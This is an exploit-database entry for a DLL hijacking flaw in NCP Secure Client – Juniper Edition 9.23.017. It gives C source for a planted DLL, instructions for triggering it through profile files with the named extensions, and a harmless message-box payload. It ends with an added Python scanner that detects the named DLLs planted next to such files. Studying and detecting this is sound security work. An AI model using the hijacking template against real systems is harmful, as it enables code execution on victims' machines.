NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit

2010-09-14T00:00:00
ID 1337DAY-ID-14074
Type zdt
Reporter secuid0
Modified 2010-09-14T00:00:00

Description

Exploit for the Windows platform, in the category of local exploits.


/*
Exploit Title: NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit (dvccsabase002.dll, conman.dll, kmpapi32.dll)
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: NCP Secure Client - Juniper Edition v.9.23.017
Vendor Site: http://www.ncp-e.com/
Download URL: http://www.ncp-e.com/en/downloadstatistik/secure-entry-client/ncp-secure-client-juniper-edition.html
Vulnerable Extensions: pcf, spd, wge, wgx
Tested Under: winxp_sp3.080413-2111

Instructions: 
1. Compile the following code
2. Create a file with one of the affected extensions in the same directory as the DLL
3. Execute file.<extension>
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

/* Proof-of-concept payload: shows a message box to confirm the DLL was loaded. */
int m0nk(void)
{
	MessageBox(0, "NCP Secure Client - Juniper Edition v.9.23.017 is vulnerable to DLL Hijacking", "secuid0", MB_OK);
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD m0nk_call, LPVOID lpReserved)
{
	switch (m0nk_call)
	{
	case DLL_PROCESS_ATTACH:
		/* Runs once, when the process loads this DLL. */
		m0nk();
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
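
A defensive check built from the file names in the advisory above (an added example, not part of the original advisory or the vendor's code): it walks a directory tree and reports any directory where one of the three named DLLs sits next to a file with an affected extension. The function names and the `trusted_dirs` parameter are assumptions made for this example, and the sample tree in `demo()` is constructed.

```python
import hashlib
import os
import tempfile

# Values taken from the advisory above.
HIJACKABLE_DLLS = {"dvccsabase002.dll", "conman.dll", "kmpapi32.dll"}
TRIGGER_EXTENSIONS = {".pcf", ".spd", ".wge", ".wgx"}


def sha256_of(path):
    """Hash a flagged file so it can be compared with the vendor's copy."""
    with open(path, "rb") as handle:
        return hashlib.sha256(handle.read()).hexdigest()


def find_planted_dlls(root, trusted_dirs=()):
    """Return (directory, dll, trigger files, sha256) for every directory under
    root that holds one of the named DLLs next to an affected file type."""
    trusted = {os.path.normcase(os.path.abspath(d)) for d in trusted_dirs}
    findings = []
    for directory, _subdirs, files in os.walk(root):
        if os.path.normcase(os.path.abspath(directory)) in trusted:
            continue  # hypothetical allow-list, e.g. the client's install directory
        # Windows file names are case-insensitive, so compare in lower case.
        dlls = [f for f in files if f.lower() in HIJACKABLE_DLLS]
        triggers = sorted(f for f in files
                          if os.path.splitext(f)[1].lower() in TRIGGER_EXTENSIONS)
        if triggers:
            for dll in sorted(dlls):
                findings.append((directory, dll, triggers,
                                 sha256_of(os.path.join(directory, dll))))
    return findings


def demo():
    """Scan a constructed directory tree (sample data, not real artefacts)."""
    with tempfile.TemporaryDirectory() as root:
        layout = {"share/vpn": ["office.PCF", "ConMan.dll"],   # flagged
                  "share/docs": ["notes.txt", "conman.dll"],   # no affected file
                  "share/profiles": ["branch.spd"]}            # no DLL
        for rel, names in layout.items():
            os.makedirs(os.path.join(root, rel))
            for name in names:
                with open(os.path.join(root, rel, name), "wb") as handle:
                    handle.write(b"constructed sample")
        return [(os.path.relpath(d, root).replace(os.sep, "/"), dll, trig)
                for d, dll, trig, _hash in find_planted_dlls(root)]
```

Pointing `find_planted_dlls` at file shares, download folders and mail attachment caches covers the places where VPN profile files are usually opened from.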


